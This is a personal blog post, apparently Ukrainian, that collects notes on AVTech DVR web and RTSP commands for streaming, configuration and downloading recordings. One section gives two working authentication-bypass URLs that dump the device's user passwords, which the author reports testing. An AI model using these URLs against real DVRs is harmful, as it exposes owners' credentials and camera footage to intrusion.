Маємо те, що маємо. Усе що відбувається

2018-12-29

AVTECH DVR HIDDEN COMMANDS

Хотів для себе накидати нотатки як підключатися до відеореєстратора фірми AVTech.

А вийшло трохи більше.
А ще, головна мета знайти як отримати повідомлення про подію з відеореєстратора що потім зчитати фрагмент цього запису. Без використання рідного програмного забезпечення.

URLS:

Перегляд за допомогою VLC player без звуку:
rtsp://DVR_URL/live/mpeg4
rtsp://DVR_URL/live/h264
Перегляд зі звуком:
rtsp://DVR_URL/live/mpeg4_ulaw
rtsp://DVR_URL/live/h264_ulaw

With ch.:
rtsp://DVR_URL/live/h264/ch0 - MAIN
rtsp://DVR_URL/live/h264/ch1 .. ch8 ... by ch.

C# Camera SDK: How to connect to your AVTECH IP camera
Одне зображення:
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=JPEG&resolution=CIF
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=JPEG&resolution=4CIF
Послідовність MJPEG
http://user:passw@DVR_URL/cgi-bin/guest/Video.cgi?media=MJPEG

INFORMATION:

FOR ALL : http://DVR_URL/cgi-bin/nobody/Machine.cgi?action=get_capability

MOBILE VIEW:

http://DVR_URL/nobody/mobile480.htm?Login=Captcha - main view
http://DVR_URL/nobody/m2.htm?ch=1&rf=3&dep=1 - ch1

Change main view ch:

http://DVR_URL/cgi-bin/user/Serial.cgi?action=write&device=MASTER&data=02 3C 00 00 23&sid=0.22579487226719663 - ch6

data=02 3E 00 00 23 - ch8
data=02 3D 00 00 23 - ch7
data=02 3C 00 00 23 - ch6
data=02 3B 00 00 23 - ch5
data=02 3A 00 00 23 - ch4
data=02 39 00 00 23 - ch3
data=02 38 00 00 23 - ch2
data=02 37 00 00 23 - ch1

data=02 1A 00 00 23 - cut1-4 and next cut4-8
data=02 19 00 00 23 - cut9

Change Resolution and Quality

From DOC:

http://DVR_URL/cgi-bin/nobody/Machine.cgi?action=get_capability

0
OK
Firmware.Version=1133-1039-1013-1025-0a-0000
MACAddress=00:0X:XX:XX:XX:XX
Product.Type=DVR
Product.ID=672
Product.ShortName=None
Video.System=PAL
Video.Input.Num=4
Video.Output.Num=1
Video.Format=H264,MJPEG
Video.Format.Default=H264
Video.Resolution=4CIF,CIF
Video.Quality=BEST,HIGH,NORMAL,BASIC
Video.Local.Input.Num=4
Video.Local.Output.Num=1
Video.Local.Format=H264,MJPEG
Audio.Input.Num=0
Audio.Output.Num=0
Audio.Format=ULAW
Audio.Local.Input.Num=1
Audio.Local.Output.Num=1
Audio.Local.Format=PCM
Language.Default=ENGLISH
Language.Support=ENGLISH&CHINESE&JAPANESE&FRANCE&GERMAN&SPANISH&CUSTOMIZE&THAI&VIETNAM&DUTCH&GREEK&ARABIC&CZECH&HUNGARIAN&
Capability=0,0,0,0

Set param Quality=BEST,Resolution=4CIF

http://DVR_URL/cgi-bin/user/Config.cgi?action=set&Video.I0.H264.Quality=BEST&Video.I0.H264.Resolution=4CIF&rnd=0.1511

А тут знайшов про баги не закриті у прошивках.

AVTECH EXPLOITS: https://www.exploit-db.com/exploits/40500

GET USERS PASSWORD!!!! :
http://DVR_URL/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
http://DVR_URL/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*

TESTED !!!! WORKS, CRAZY

https://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities

Status

By some CGI Tutorials:

AVTECH CGI Command Set Specification 2.1 [Link1], [Link2]
CGI_Tutorial.pdf [Link1] [Link2]
CGI_Prikazy_stahovani_JPEG_snimku_z_kamer.txt
CGI_prikazy_download_records.txt

Request: (GET|POST)
URL: http://DVR_URL/cgi-bin/guest/SmartMonitor.cgi
Result:

0
OK
SmartMonitor=Alive

Request: (POST)
URL: http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi
Parameter

Result:

Syntax:

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&hdd_num=<hdd_num_value>&channel=<channel_value>&start_time=<start_time>&end_time=<end_time>
where format of start_time=2007 05 28 16 00 10 , end_time=2007 05 28 16 10 59

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&type=<type_parameter>

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&type=<type_parameter>&command=<command_parameter>&hdd_num=<hdd_num_value>&list_num=<list_num_value>&list_type=<list_type_parameter>

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&hdd_num=<hdd_num_value>&start_time=<start_time>

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&channel=<channel_value>&hdd_num=<hdd_num_value>&event=<event_parameter>&start_time=<start_time>

http://DVR_URL/cgi-bin/supervisor/NetworkBk.cgi?action=<action_parameter>&command=<command_parameter>
where
<action_parameter> : download, query, playback, event_search, time_search, retr
<type_parameter> : hdd, search_list, dependent
<command_parameter> : forward, backward, latest, on, off
<list_type_parameter> : ALL, MANUAL, SYSTEM, ALARM, MOTION
<event_parameter> : alarm, motion
<hdd_num_value> : 1, 2, 3, …
<channel_value> : 1, 2, 3, …
<list_num_value> : 100

Example:
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=retr&command=on)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=event_search&channel=1&hdd_num=1&event=alarm&start_time=2007 10 16 13 00 00)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=time_search&hdd_num=1&start_time=2007 10 16 13 00 00)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=download&num=1&channel=1&start_time=2007 05 28 16 00 10&end_time=2007 05 28 16 10 59)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=query&type=search_list&command=latest&hdd_num=1&list_num=100&list_type=ALL)
(http://192.168.5.124:88/cgi-bin/supervisor/NetworkBk.cgi?action=query&type=hdd)

Маємо те, що маємо. Усе що відбувається - на краще

MYCSS